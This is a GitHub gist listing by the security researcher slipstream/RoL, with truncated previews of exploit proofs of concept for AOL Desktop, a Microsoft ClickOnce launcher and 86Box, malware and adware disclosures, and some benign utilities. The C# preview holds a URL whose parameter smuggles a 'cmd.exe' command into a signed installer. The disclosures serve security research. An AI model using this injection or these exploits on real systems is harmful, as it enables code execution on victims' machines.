Skip to content

Instantly share code, notes, and snippets.

slipstream/RoL Wack0

Block or report user

Report or block Wack0

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Wack0
Wack0 / ayy-oh-lmao.js
Last active Dec 8, 2015
AOL Desktop <= 9.8.1 FS Read/Write via MITM, <= 9.8.0 Remote Command Execution via MITM PoC
View ayy-oh-lmao.js
/*
ayy-oh-lmao.js
AOL Desktop <= 9.8.0 File Write and Remote Command Execution via MITM
AOL Desktop <= 9.8.1 File Write via MITM.
by slipstream/RoL, between August and December 2015.
irc.rol.im #rol ** http://rol.im/chat/ ** twitter @TheWack0lian
The custom AOL protocol, includes a scripting language called FDO91 (FDO), that's compiled into a bytecode.
Compiled FDO makes up part of the data sent from server to client and client to server.
@Wack0
Wack0 / adwareroi.md
Last active Apr 21, 2016
AdwareROI MiTM certificates and private keys
View adwareroi.md

AdwareROI

AdwareROI is basically the world's shittiest MiTM malware ever.

It's being sold for $5.5k for one panel/binary, $16k for multiple panels/binaries, and probably ten times that if you want src too. That doesn't include the SSL MiTM functionality which is another $1k.

And.. as I said, it's shitty. The MiTM functionality relies on WinDivert, the SSL MiTM uses a custom component, which is (seriously!) called mitm_test_poc. And it uses a hardcoded CA cert and private key, that's installed with the other components.

So, what to do but disclose these as I obtain them?

@Wack0
Wack0 / programmatic_poc.cs
Last active Dec 14, 2016
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
View programmatic_poc.cs
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
@Wack0
Wack0 / SbpParse.cs
Created Jan 13, 2017
Secure Boot Policy parser
View SbpParse.cs
using System;
using System.IO;
using LipingShare.LCLib.Asn1Processor;
using System.Runtime.InteropServices;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;
namespace SbpParse {
View gist:25a155e9f7ecef46da180b55b7e87931

Setup: https://www.virustotal.com/en/file/4280f729d317156706db6e9c87503d636f806e09efdfcf00e73dd3e71740c966/analysis/ App: https://www.virustotal.com/en/file/2260f04aff68f77102525c61ccab4680b869b27672f6939693b23c1c04c7fe82/analysis/ Unpacked + partially-deobfuscated: https://www.virustotal.com/en/file/f754f949651f628b3f1c1fbe327d7b87ea63ecdab6c59b8431d459e67b11cbd2/analysis/

Deobfuscated taskscheduler .xml string:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2016-10-28T00:37:02.5049122</Date>
@Wack0
Wack0 / blob10_pass.php
Created Jan 20, 2017
Blobby 10 password generation algorithm
View blob10_pass.php
<?php
// Blobby 10 zip-password generation algorithm.
array_shift($argv);
foreach ($argv as $zip) {
$p = '[';
$firstchar = ord($zip[0]);
$whitelisted_zips = array(
'9EIAC5FD.ZIP',
@Wack0
Wack0 / mastostats.php
Last active Apr 19, 2017
CLI Mastodon network stats script. Uses instances.mastodon.xyz. Updates every 60 seconds.
View mastostats.php
<?php
// This class adapted from: https://www.if-not-true-then-false.com/2010/php-class-for-coloring-php-command-line-cli-scripts-output-php-output-colorizing-using-bash-shell-colors/
class Colors {
private static $foreground_colors = array(
'black'=>'0;30',
'dark_gray'=>'1;30',
'blue'=>'0;34',
'light_blue'=>'1;34',
'green'=>'0;32',
@Wack0
Wack0 / cex_crypto.cs
Created May 23, 2017
Compaq/HP Recovery Media (c. late 1990s-early 2000s) .CEX File Decryptor
View cex_crypto.cs
/*
Compaq/HP Recovery Media (c. late 1990s-early 2000s) .CEX File Decryptor
another rrrring of lightningggg production by slipstream/RoL!
Yesterday I received in the post some Compaq recovery media I ordered from Yahoo! Auctions Japan to dump.
Having done that, I took a closer look at the disc images.
The recovery media came in two CDs: a boot CD ("COMPAQ Restore CD"), and an OS CD ("Compaq CD for Microsoft Windows
NT Workstation 4.0 Operating System").
@Wack0
Wack0 / gist:17c56b77a90073be81d3
Last active Mar 6, 2018
It's not just superfish that's the problem.
View gist:17c56b77a90073be81d3
Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now.
Superfish isn't the only product to use that sdk. there's others too.
Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private
key pair. Seems a lot of people think they all use the superfish cert. That is
NOT the case.
First thing I checked was komodia's own parental control software,
Keep My Family Secure. (mentioned on komodia's own website).
@Wack0
Wack0 / 86box-td0.php
Last active Mar 20, 2018
Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) Code Execution PoC
View 86box-td0.php
<?php
/*
Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) can cause code execution
calc.exe PoC for both builds (the x86 AMD and Intel binaries!)
a *Ring of Lightning* production by slipstream/RoL!
Please note that due to lack of available hardware, exploitation of the AMD binaries has not been tested.
So you may have to fix that yourself.
86Box is a fork of PCem maintained by Battler aka Tenshi aka Kiririn/RoL.
You can’t perform that action at this time.